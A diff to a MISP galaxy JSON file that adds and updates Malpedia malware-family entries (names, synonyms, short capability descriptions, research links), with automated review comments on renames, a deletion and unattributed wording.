"https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" + "https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/", + "https://en.wikipedia.org/wiki/Nitol_botnet", + "https://krebsonsecurity.com/tag/nitol/" ], "synonyms": [], "type": [] 
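Review bot: Renaming the Ngioweb element's `value` from `"Ngioweb"` to `"Ngioweb (Windows)"` keeps its uuid (`35fd764f-8723-4663-9bbf-5b02a64ec02e`), but MISP tag names are derived from the value string, so events already tagged `misp-galaxy:malpedia="Ngioweb"` may no longer map to this cluster once the galaxy is updated. Adding the previous name as a synonym, `"synonyms": ["Grobios", "Ngioweb"]`, would at least keep lookups by the old name working; whether MISP migrates existing tags on uuid match should be confirmed before relying on it. The same concern applies to the Octopus → "Octopus (Windows)" rename later in this diff.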
@@ -12456,17 +22922,55 @@ "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", "value": "Nitol" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nixscare", + "https://twitter.com/3xp0rtblog/status/1302584919592501248" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a49d1134-f4d9-4778-bbd4-c70655be9cf6", + "value": "NixScare Stealer" + }, { "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. 
Similar to other RATs, many leaked builders may be backdoored.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", - "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", - "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", - "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "https://asec.ahnlab.com/1369", + "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "http://blogs.360.cn/post/analysis-of-apt-c-37.html" + "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", + "https://www.4hou.com/posts/VoPM", + "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware", + "https://blogs.360.cn/post/APT-C-44.html", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", + "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control", + 
"https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://ti.360.net/blog/articles/analysis-of-apt-c-27/", + "https://blog.reversinglabs.com/blog/rats-in-the-library" ], "synonyms": [ "Bladabindi" @@ -12495,7 +22999,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", - "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [], "type": [] 
@@ -12530,17 +23036,51 @@ "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", "value": "nRansom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.numando", + "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "69d63487-6200-4f71-845e-df3997402b00", + "value": "Numando" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit", + "http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf", + "https://twitter.com/Bank_Security/status/1134850646413385728", + "https://twitter.com/r3c0nst/status/1135606944427905025" + ], + "synonyms": [], + "type": [] + }, + "uuid": "83cfa206-b485-47fd-b298-1b008ab86507", + "value": "NVISOSPIT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/", + "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled", "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded", + "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/", "https://bitbucket.org/daniel_plohmann/idapatchwork", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", + "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", - "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim" + "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim", + 
"https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + "https://www.lawfareblog.com/what-point-these-nation-state-indictments" ], "synonyms": [ "nymain" @@ -12563,6 +23103,38 @@ "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", "value": "Nymaim2" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat", + "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://securelist.com/transparent-tribe-part-2/98233/", + "https://www.secrss.com/articles/24995", + "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "33c138a0-85d3-4497-90e9-ada1d501a100", + "value": "Oblique RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene", + "https://habr.com/ru/post/27053/", + "https://sysopfb.github.io/malware/2020/02/28/Golang-Wrapper-on-an-old-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8f623a37-80a4-4240-9586-6ea7a2a97e30", + "value": "Obscene" + }, { "description": "", "meta": { @@ -12581,13 +23153,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus", - "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + "https://securelist.com/octopus-infested-seas-of-central-asia/88200/", + "https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw", + "https://isc.sans.edu/diary/26918" ], "synonyms": [], "type": [] }, "uuid": "777b76f9-5390-4899-b201-ebaa8a329c96", - "value": "Octopus" + "value": "Octopus (Windows)" }, { "description": "", 
@@ -12606,7 +23180,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] @@ -12614,6 +23189,22 @@ "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", "value": "Odinaff" }, + { + "description": "a new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", + "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "af2e4e0d-e8ae-48a9-aac4-2a49242c68d2", + "value": "Okrum" + }, { "description": "According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28.\r\nIt targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data.\r\nIn some places it is mistakenly named \"Sasfis\", which however seems to be a completely different and unrelated malware family.", "meta": { 
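Review bot: The new Okrum description is a first-person sentence copied from a vendor write-up ("a new, previously unknown backdoor that we named Okrum") with no attribution, so a galaxy reader cannot tell who "we" is; the other descriptions in this file name their source ("According to FireEye, OLDBAIT …", "RedPacket Security describes NJRat as …"). The phrasing matches the ESET welivesecurity post already listed in the refs, so a consistent rewording would be `"According to ESET, Okrum is a previously unknown backdoor whose operators focused on the same targets in Slovakia previously hit by the Ketrican 2015 backdoors."`. Since the file is generated from the Malpedia API, the wording should be fixed upstream so it is not overwritten on the next refresh.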
@@ -12635,41 +23226,42 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", + "https://www.youtube.com/watch?v=a4BZ3SZN-CI", "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", + "https://www.youtube.com/watch?v=1jgdMY12mI8", "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://www.youtube.com/watch?v=wCv9SiSA7Sw", + "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/", "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights", "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", - "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/", + "https://www.mbsd.jp/blog/20180215.html", "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" ], - "synonyms": [], + "synonyms": [ + "SOURGRAPE" + ], "type": [] }, "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", "value": "Olympic Destroyer" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", - "https://twitter.com/malwrhunterteam/status/1001461507513880576" - ], - 
"synonyms": [], - "type": [] - }, - "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", - "value": "OneKeyLocker" - }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", - "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" + "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] @@ -12677,11 +23269,27 @@ "uuid": "82733125-da67-44ff-b2ac-b16226088211", "value": "ONHAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni", + "https://www.bleepingcomputer.com/news/security/oni-ransomware-used-in-month-long-attacks-against-japanese-companies/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c182f370-4721-4968-a3b1-a7e96ab876df", + "value": "Oni Ransomware" + }, { "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", + "https://blog.f-secure.com/podcast-dukes-apt29/", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock", "https://www.f-secure.com/weblog/archives/00002764.html", "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html" ], 
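Review bot: Deleting the OneKeyLocker element outright (uuid `838e2a3a-c4cb-4bee-b07f-c97b143c68d6`) removes a cluster identifier that existing MISP events, and any `related` entries in other galaxies, may still reference via `misp-galaxy:malpedia="OneKeyLocker"`; after this update those tags point at nothing. If the cluster schema in use supports marking an element as revoked or deprecated, keeping the element with that flag is safer than removing it; otherwise the removal should at least be called out in the commit message so consumers know to expect the orphaned tag. The deletion is presumably because the upstream API no longer exposes `win.onekeylocker`, so the policy has to be applied in the import script rather than by hand here.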
@@ -12692,11 +23300,13 @@ "value": "OnionDuke" }, { - "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", + "description": "A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", - "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" + "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/", + "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html", + "https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html" ], "synonyms": [ "Onliner", @@ -12712,6 +23322,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" ], @@ -12738,7 +23349,7 @@ "value": "Opachki" }, { - "description": "", + "description": "This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", 
@@ -12781,7 +23392,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", - "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood" ], "synonyms": [], "type": [] 
@@ -12794,28 +23406,36 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", - "https://orcustechnologies.com/", + "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", + "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/" ], - "synonyms": [], + "synonyms": [ + "Schnorchel" + ], "type": [] }, "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", "value": "Orcus RAT" }, { - "description": "", + "description": "This malware claims to be a ransomware, but it's actually a wiper. After execution, this malware terminates a number of processes such as database processes, likely to allow access to any files that these programs may have held open. Ordinypt will avoid wiping certain files and folders in order to prevent the infected machine from becoming unusable. Affected files are overwritten with null character and receive a random 5 character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in occurs to keep track of the file extension used on that specific machine, as well as which BitCoin address was randomly provided for payment to the victim (drawn from a long list stored in the ransomware configuration). 
", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", + "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html", "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", - "https://www.gdata.de/blog/2017/11/30151-ordinypt" + "https://www.gdata.de/blog/2017/11/30151-ordinypt", + "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/" + ], + "synonyms": [ + "GermanWiper", + "HSDFSDCrypt" ], - "synonyms": [], "type": [] }, "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", 
@@ -12825,12 +23445,59 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", - "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski", + "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/", + "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer", + "https://twitter.com/albertzsigovits/status/1160874557454131200" ], "synonyms": [], "type": [] }, + "uuid": "414d8e68-77e7-4157-936a-d70d80e5efc0", + "value": "Oski Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.osno", + "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit" + ], + "synonyms": [ + "Babax" + ], + "type": [] + }, + "uuid": "e2be4da9-0a8f-45a5-a69b-7f16acb39398", + "value": "Osno" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.outcrypt", + "https://id-ransomware.blogspot.com/2020/07/outcrypt-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "90e5a21a-c058-47a0-aa4d-bffde7ba698e", + "value": "OutCrypt Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", + "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf", + "https://twitter.com/VK_Intel/status/1085820673811992576", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + ], + "synonyms": [ + "FACADE" + ], + "type": [] + }, "uuid": "10a521e4-b3b9-4feb-afce-081531063e7b", "value": "Outlook Backdoor" }, 
@@ -12866,7 +23533,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", - "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" + "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/", + "https://www.secureworks.com/research/threat-profiles/bronze-union" ], "synonyms": [ "luckyowa" @@ -12876,6 +23544,45 @@ "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", "value": "owaauth" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy", + "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7a6d97a2-821f-4083-9180-3f70a851ad5e", + "value": "Owlproxy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ozh_rat", + "https://twitter.com/BushidoToken/status/1266075992679948289" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c9eefa23-4881-490f-abff-c78fe0c165ff", + "value": "OZH RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ozone", + "https://www.fortinet.com/blog/threat-research/german-speakers-targeted-by-spam-leading-to-ozone-rat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4e319700-9350-4656-91f5-0b495af4e8ad", + "value": "Ozone RAT" + }, { "description": "", "meta": { 
@@ -12911,17 +23618,15 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", + "https://www.youtube.com/watch?v=J7VOfAJvxEY", "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", - "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", - "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", - "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", - "https://www.spamhaus.org/news/article/771/", - "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", - "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", - "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", + "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", + "https://www.spamhaus.org/news/article/771/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", - "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", + "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" ], 
@@ -12933,6 +23638,41 @@ "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", "value": "PandaBanker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise", + "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again", + "https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/", + "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4f7e7602-79f8-4eea-8239-fb2d4ceadb9f", + "value": "Paradise Ransomware" + }, + { + "description": "Parallax is a Remote Access Trojan used by attackers to gain access to a victim's machine. It was involved in one of the many infamous \"coronamalware\" campaigns. Basically, the attackers abused the COVID-19 pandemic news to lure victims into opening themed emails spreading parallax.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax", + "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html", + "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", + "https://blog.morphisec.com/parallax-rat-active-status", + "https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/", + "https://twitter.com/malwrhunterteam/status/1227196799997431809" + ], + "synonyms": [ + "ParallaxRAT" + ], + "type": [] + }, + "uuid": "39f74f33-467e-47a4-bd2f-e0a191dee9ca", + "value": "Parallax RAT" + }, { "description": "", "meta": { 
@@ -12946,6 +23686,68 @@ "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": "parasite_http" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock", + "https://id-ransomware.blogspot.com" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1e78c732-c2f0-4178-a1f5-ccdab0e2d4b8", + "value": "Passlock Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key", + "https://research.checkpoint.com/2020/ransomware-alert-pay2key/", + "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf" + ], + "synonyms": [ + "Cobalt" + ], + "type": [] + }, + "uuid": "46dc64c6-e927-44fc-b4a4-efd1677ae030", + "value": "Pay2Key" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-133c", + "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1", + "https://blog.reversinglabs.com/blog/hidden-cobra" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d6da9699-778c-4c97-82f4-1e9113283bd4", + "value": "PEBBLEDASH" + }, + { + "description": "PeddleCheap is a module of the DanderSpritz framework which surface with the \"Lost in Translation\" release of TheShadowBrokers leaks. 
In May 2020, ESET mentioned that they found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap", + "https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2#", + "https://twitter.com/ESETresearch/status/1258353960781598721", + "https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ee450087-00e4-4b59-9ea7-6650d5551ea9", + "value": "PeddleCheap" + }, { "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", "meta": { @@ -12959,6 +23761,19 @@ "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", "value": "Peepy RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pekraut", + "https://www.gdatasoftware.com/blog/2020/04/35849-pekraut-german-rat-starts-gnawing" + ], + "synonyms": 